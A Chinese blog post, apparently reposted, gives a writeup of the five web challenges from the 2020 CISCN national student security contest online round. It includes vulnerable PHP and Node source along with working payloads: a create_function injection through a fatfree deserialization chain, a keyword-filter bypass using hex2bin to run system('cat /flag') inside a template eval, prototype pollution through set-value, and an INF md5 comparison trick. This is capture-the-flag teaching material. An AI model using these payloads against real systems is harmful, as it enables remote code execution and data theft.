0x7f php过滤,2020全国大学生信息安全竞赛Online Web题解 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...

最新推荐文章于 2024-04-23 21:56:40 发布
最新推荐文章于 2024-04-23 21:56:40 发布
阅读量564 收藏 1
点赞数
文章标签: 0x7f php过滤

0x00 前言

周末参加了一下国赛,有两年没参与了,还是一如既往的“吓人”。

0x01 babyunserialize

题目存在源码泄露:http://eci-2ze0loaxjkuesryhroqr.cloudeci1.ichunqiu.com/www.zip

打开后发现是fatfree框架,进行代码审计,发现目标网站使用了php框架fatfree,且为最新版。同时关注到index.php路由:$f3->route('GET /',

function($f3) {

echo "may be you need /?flag=";

}

);

unserialize($_GET['flag']);

发现题目给了一个反序列化位置,且参数可控。

于是在网上搜索fatfree相关的rce chain,可以搜到此题曾在2020 WMCTF中出现过。

但搜索网上相关的pop chain,发现都没打通,于是选择自己思考。

虽然这里CLI\Agent::fetch()被删除,但其存在的send方法潜在安全隐患:function send($op,$data='') {

$server=$this->server;

$mask=WS::Finale | $op & WS::OpCode;

$len=strlen($data);

$buf='';

if ($len>0xffff)

$buf=pack('CCNN',$mask,0x7f,$len);

elseif ($len>0x7d)

$buf=pack('CCn',$mask,0x7e,$len);

else

$buf=pack('CC',$mask,$len);

$buf.=$data;

if (is_bool($server->write($this->socket,$buf)))

return FALSE;

if (!in_array($op,[WS::Pong,WS::Close]) &&

isset($this->server->events['send']) &&

is_callable($func=$this->server->events['send']))

$func($this,$op,$data);

return $data;

}

此处注意到关键位置:if (is_bool($server->write($this->socket,$buf)))

return FALSE;

我们发现,此处$server和$this->socket均可控,那么可以用来构造任意代码执行。但是存在问题,哪一个命令执行的php函数有2个参数,且第一个参数可控,第二个参数不可控就可以进行RCE?

这里想到create_function,我们可以利用如下方式,在第一个参数位置进行代码注入:){}phpinfo();//

构造exp,并发现可以成功执行phpinfo:

9219da181ded77f53424bf5a6b629b14.png

得到flag:

7d2927c74859a4e072526673f67d5437.png

0x02 easyphp

题目给出了源码:<?php

//题目环境:php:7.4.8-apache

$pid = pcntl_fork();

if ($pid == -1) {

die('could not fork');

}else if ($pid){

$r=pcntl_wait($status);

if(!pcntl_wifexited($status)){

phpinfo();

}

}else{

highlight_file(__FILE__);

if(isset($_GET['a'])&&is_string($_GET['a'])&&!preg_match("/[:\\\\]|exec|pcntl/i",$_GET['a'])){

call_user_func_array($_GET['a'],[$_GET['b'],false,true]);

}

posix_kill(posix_getpid(), SIGUSR1);

}

此题有点不同寻常,和一般的web题有点差异,这里简单看了一下,我们需要在如下情况,才能调用phpinfo():if(!pcntl_wifexited($status)){

phpinfo();

}

查阅手册:

a7410b56201b2f62ab048f9439ad873d.png

发现我们需要让子进程不正常退出,这里考虑到使用后面的call_user_func:if(isset($_GET['a'])&&is_string($_GET['a'])&&!preg_match("/[:\\\\]|exec|pcntl/i",$_GET['a'])){

call_user_func_array($_GET['a'],[$_GET['b'],false,true]);

}

通过搜索php bug,可以得知:https://bugs.php.net/bug.php?id=52173

这里我们可以利用pcntl_waitpid:http://eci-2ze0y4x958n2qhsgv27b.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_waitpid

c2f3cb5e5db6eba39a3096046b4fda2d.png

即可在phpinfo中获取flag。

0x03 rceme

题目给出了源码:<?php

error_reporting(0);

highlight_file(__FILE__);

parserIfLabel($_GET['a']);

function danger_key($s) {

$s=htmlspecialchars($s);

$key=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','$','system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert');

$s = str_ireplace($key,"*",$s);

$danger=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','$','system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert');

foreach ($danger as $val){

if(strpos($s,$val) !==false){

die('很抱歉,执行出错,发现危险字符【'.$val.'】');

}

}

if(preg_match("/^[a-z]$/i")){

die('很抱歉,执行出错,发现危险字符');

}

return $s;

}

function parserIfLabel( $content ) {

$pattern = '/\{if:([\s\S]+?)}([\s\S]*?){end\s+if}/';

if ( preg_match_all( $pattern, $content, $matches ) ) {

$count = count( $matches[ 0 ] );

for ( $i = 0; $i 

$flag = '';

$out_html = '';

$ifstr = $matches[ 1 ][ $i ];

$ifstr=danger_key($ifstr,1);

if(strpos($ifstr,'=') !== false){

$arr= splits($ifstr,'=');

if($arr[0]=='' || $arr[1]==''){

die('很抱歉,模板中有错误的判断,请修正【'.$ifstr.'】');

}

$ifstr = str_replace( '=', '==', $ifstr );

}

$ifstr = str_replace( '<>', '!=', $ifstr );

$ifstr = str_replace( 'or', '||', $ifstr );

$ifstr = str_replace( 'and', '&&', $ifstr );

$ifstr = str_replace( 'mod', '%', $ifstr );

$ifstr = str_replace( 'not', '!', $ifstr );

if ( preg_match( '/\{|}/', $ifstr)) {

die('很抱歉,模板中有错误的判断,请修正'.$ifstr);

}else{

@eval( 'if(' . $ifstr . '){$flag="if";}else{$flag="else";}' );

}

if ( preg_match( '/([\s\S]*)?\{else\}([\s\S]*)?/', $matches[ 2 ][ $i ], $matches2 ) ) {

switch ( $flag ) {

case 'if':

if ( isset( $matches2[ 1 ] ) ) {

$out_html .= $matches2[ 1 ];

}

break;

case 'else':

if ( isset( $matches2[ 2 ] ) ) {

$out_html .= $matches2[ 2 ];

}

break;

}

} elseif ( $flag == 'if' ) {

$out_html .= $matches[ 2 ][ $i ];

}

$pattern2 = '/\{if([0-9]):/';

if ( preg_match( $pattern2, $out_html, $matches3 ) ) {

$out_html = str_replace( '{if' . $matches3[ 1 ], '{if', $out_html );

$out_html = str_replace( '{else' . $matches3[ 1 ] . '}', '{else}', $out_html );

$out_html = str_replace( '{end if' . $matches3[ 1 ] . '}', '{end if}', $out_html );

$out_html = $this->parserIfLabel( $out_html );

}

$content = str_replace( $matches[ 0 ][ $i ], $out_html, $content );

}

}

return $content;

}

function splits( $s, $str=',' ) {

if ( empty( $s ) ) return array( '' );

if ( strpos( $s, $str ) !== false ) {

return explode( $str, $s );

} else {

return array( $s );

}

}

简单搜了下,发现是ZZZCMS源码的一部分,参考链接如下:https://cloud.tencent.com/developer/article/1576196

但是通过diff,发现这里的过滤比ZZZCMS多一些:$danger=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','$','system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert');

参考到这篇文章:https://forum.90sec.com/t/topic/1239

其exp如下:{if:array_map(base_convert(27440799224,10,32),array(1))}{end if}

考虑该题过滤了base_convert函数,这里想一个新的bypass方案,尝试使用hex2bin:{if:array_map(hex2bin('73797374656d'),array('ls'))}{end if}

搭配使用system函数,即可rce获取flag:{if:array_map(hex2bin('73797374656d'),array('cat /flag'))}{end if}

访问:http://eci-2zed3ztpomt9lasf47o6.cloudeci1.ichunqiu.com/?a={if:array_map(hex2bin(%2773797374656d%27),array(%27cat%20/flag%27))}{end%20if}

52ef1e464f53f90bdfffaaf132d4593d.png

0x04 littlegame

题目给了源码,简单看一下:var express = require('express');

const setFn = require('set-value');

var router = express.Router();

const COMMODITY = {

"sword": {"Gold": "20", "Firepower": "50"},

// Times have changed

"gun": {"Gold": "100", "Firepower": "200"}

}

const MOBS = {

"Lv1": {"Firepower": "1", "Bounty": "1"},

"Lv2": {"Firepower": "5", "Bounty": "10"},

"Lv3": {"Firepower": "10", "Bounty": "15"},

"Lv4": {"Firepower": "20", "Bounty": "30"},

"Lv5": {"Firepower": "50", "Bounty": "65"},

"Lv6": {"Firepower": "80", "Bounty": "100"}

}

const BOSS = {

// Times have not changed

"Firepower": "201"

}

const Admin = {

"password1":process.env.p1,

"password2":process.env.p2,

"password3":process.env.p3

}

router.post('/BuyWeapon', function (req, res, next) {

// not implement

res.send("BOOS has said 'Times have not changed'!");

});

router.post('/EarnBounty', function (req, res, next) {

// not implement

res.send("BOOS has said 'Times have not changed'!");

});

router.post('/ChallengeBOSS', function (req, res, next) {

// not implement

res.send("BOOS has said 'Times have not changed'!");

});

router.post("/DeveloperControlPanel", function (req, res, next) {

// not implement

if (req.body.key === undefined || req.body.password === undefined){

res.send("What's your problem?");

}else {

let key = req.body.key.toString();

let password = req.body.password.toString();

if(Admin[key] === password){

res.send(process.env.flag);

}else {

res.send("Wrong password!Are you Admin?");

}

}

});

router.get('/SpawnPoint', function (req, res, next) {

req.session.knight = {

"HP": 1000,

"Gold": 10,

"Firepower": 10

}

res.send("Let's begin!");

});

router.post("/Privilege", function (req, res, next) {

// Why not ask witch for help?

if(req.session.knight === undefined){

res.redirect('/SpawnPoint');

}else{

if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {

res.send("What's your problem?");

}else {

let key = req.body.NewAttributeKey.toString();

let value = req.body.NewAttributeValue.toString();

setFn(req.session.knight, key, value);

res.send("Let's have a check!");

}

}

});

module.exports = router;

首先看如何获取flag:router.post("/DeveloperControlPanel", function (req, res, next) {

// not implement

if (req.body.key === undefined || req.body.password === undefined){

res.send("What's your problem?");

}else {

let key = req.body.key.toString();

let password = req.body.password.toString();

if(Admin[key] === password){

res.send(process.env.flag);

}else {

res.send("Wrong password!Are you Admin?");

}

}

});

发现只要:if(Admin[key] === password){

res.send(process.env.flag);

}

即可获取flag。这里不难发现:const setFn = require('set-value');

存在原型链污染的问题,查看调用处:router.post("/Privilege", function (req, res, next) {

// Why not ask witch for help?

if(req.session.knight === undefined){

res.redirect('/SpawnPoint');

}else{

if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {

res.send("What's your problem?");

}else {

let key = req.body.NewAttributeKey.toString();

let value = req.body.NewAttributeValue.toString();

setFn(req.session.knight, key, value);

res.send("Let's have a check!");

}

}

});

发现key和value都可控,那就好办了,这里直接进行污染:

f224f367e0ed14c24d2e098c7eeef8a6.png

然后去获取flag:

b2327a295397af149d0fc16972e16f19.png

0x05 easytrick

题目给出了源码:trick1 = (string)$this->trick1;

if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){

die("你太长了");

}

if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){

echo file_get_contents("/flag");

}

}

}

highlight_file(__FILE__);

unserialize($_GET['trick']);

题目考察了一个小trick,要求2个变量不相等,但md5相同,以往都需要使用诸如如下工具进行爆破:https://github.com/upbit/clone-fastcoll

这里由于有长度限制,我们可以使用trick:<?php

class trick{

public $trick1=INF;

public $trick2=1/0;

}

$exp = new trick();

echo serialize($exp);

即可进行bypass,访问:http://eci-2ze6ie6rtdjhwozbsgmd.cloudeci1.ichunqiu.com/?trick=O:5:%22trick%22:2:{s:6:%22trick1%22;d:INF;s:6:%22trick2%22;d:INF;}

b48f85e0aeb78f47d33cea028d1ef62d.png

即可获取flag。

0x06 后记

线上赛的web题还是比较简单的,可能是因为考虑参赛面广,入围资格也多吧。

tim0018
关注
【CISCN 2020】初赛 writeup web部分
LOST frequency的博客
08-25 2286
CISCN2020初赛 writeup web部分 目录CISCN2020初赛 writeup web部分web1:easyphp思路payloadweb2:babyunserialize考点思路payload:web3:rceme题目源码考点思路payloadweb4:littlegame题目源码:考点思路payloadweb5:easytrick题目源码考点思路payload web1:easyphp <?php //题目环境:php:7.4.8-apache $pid = pcn
2023全国大学生信息安全竞赛安徽省赛-初赛WP
qq_43647197的博客
09-27 3457
2023全国大学生信息安全竞赛安徽省赛-初赛WP
php 去除 字符串_php如何去掉字符串中的字符串
weixin_36024829的博客
03-09 680
php去掉字符串中的字符串的方法:首先创建一个PHP示例文件;然后定义一组字符串;最后通过“str_replace”函数去除指定字符串即可。php 去掉字符串中的一段字符串代码如下:$str = 'abc123abc';echo str_replace('123', '', $str);str_replace() 函数替换字符串中的一些字符(区分大小写)。该函数必须遵循下列规则:如果搜索的字符串是...
2021暨南大学CTF生杯(Web篇)
恒Keep毅
12-03 5594
目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行?我该怎么绕过读取文件呢?【3星?
CTF每日刷题
YHXSunny123456789的博客
04-26 446
在地址栏中继续输入flag={{ config.SECRET_KEY}},之后转跳得到flag。
【无标题】
最新发布
2301_79880442的博客
04-23 1171
包含三个if条件:1.get传参aaa,2.post传参admin和root_pwd,二者传入的值不能够相同,但是sha1值要相等,相等就成功进入level 3.3.post传参level_3,对其进行后,如果就会输出flag。第一个的绕过:preg_replace 函数执行一个正则表达式的搜索和替换。它会把传入的level替换为filtered.但是该函数只会搜索第一行的字符串,所以就可以用换行符替换。其中%0a是换行符,%23是#
中国科学技术大学第十届信息安全大赛的官方与非官方题解 .zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
中国科学技术大学第七届信息安全大赛的官方与非官方题解.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
中国科学技术大学第八届信息安全大赛的官方与非官方题解.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
中国科学技术大学第十届信息安全大赛的官方与非官方题解源码+项目说明.zip
01-30
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...中国科学技术大学第十届信息安全大赛的官方与非官方题解源码+项目说明.zip
Unserialize反序列化
weixin_44087538的博客
03-27 1208
s:30:"}作为SESSION的key,将 0:1:"A":1:{s:1:"a”;session.serialize_handler 是用来设置session的序列话引擎的,除了默认的 php 引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。在 php_binary 的例子中由于 name 的长度是4,4在ASCII表中对应的就是 EOT ,为不可见字符,所以这里用了URL编码的格式,实际上在不特殊编码的情况下我们看到的是 names:6:"spoock"
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3388
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
CISCN2020初赛_Web
Lemon's blog
08-30 1167
easytrick <?php class trick{ public $trick1; public $trick2; public function __destruct(){ $this->trick1 = (string)$this->trick1; if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ die(
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1695
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
informatica 面试题大全(持续更
zhanglc_5168的专栏
08-07 3690
转自:http://blog.csdn.net/suncrafted/article/details/3739472
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
第十三届全国大学生信息安全竞赛 2020CISCN 线上初赛Writeup
末初的CSDN博客
09-06 5671
第十三届全国大学生信息安全竞赛
第十三届全国大学生信息安全竞赛(线上初赛)
A_dmin的博客
08-21 1万+
第十三届全国大学生信息安全竞赛(线上初赛) WEB easyphp 打开题目拿到源码: 让进程异常退出,进入到phpinfo中 payload: http://eci-2ze4mvter6u3r4shc9j6.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait 运行得到phpinfo,找到flag即可: RCEME 貌似有原题,不过过滤的不一样,这道题没有过滤反撇号: <?php error_reporting(0); h
php unserialize返回false的解决办法
fangdong88的博客
05-31 1099
php unserialize失败返回false原因多半是序列化数据时的编码与反序列化时的编码不一致,导致单引号等特殊字符计算长度不正确,所以解决办法是重计算长度。百度了很多办法,全是坑呀,百度的那些办法根本没用,都是错的。所以自己写了个,绝对有效!反序列化时用下面函数处理下就行function common_unserialize($serial_str) { $serial...
算法艺术与信息学竞赛题解深度解析:从基础到高级
《算法艺术与信息学竞赛题目完全解析》是一本深入讲解算法设计、数据结构以及它们在信息学竞赛中的应用的专业书籍。该书详细介绍了编程的基础——算法和数据结构,旨在帮助读者理解和掌握核心概念,以便在竞赛中取得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值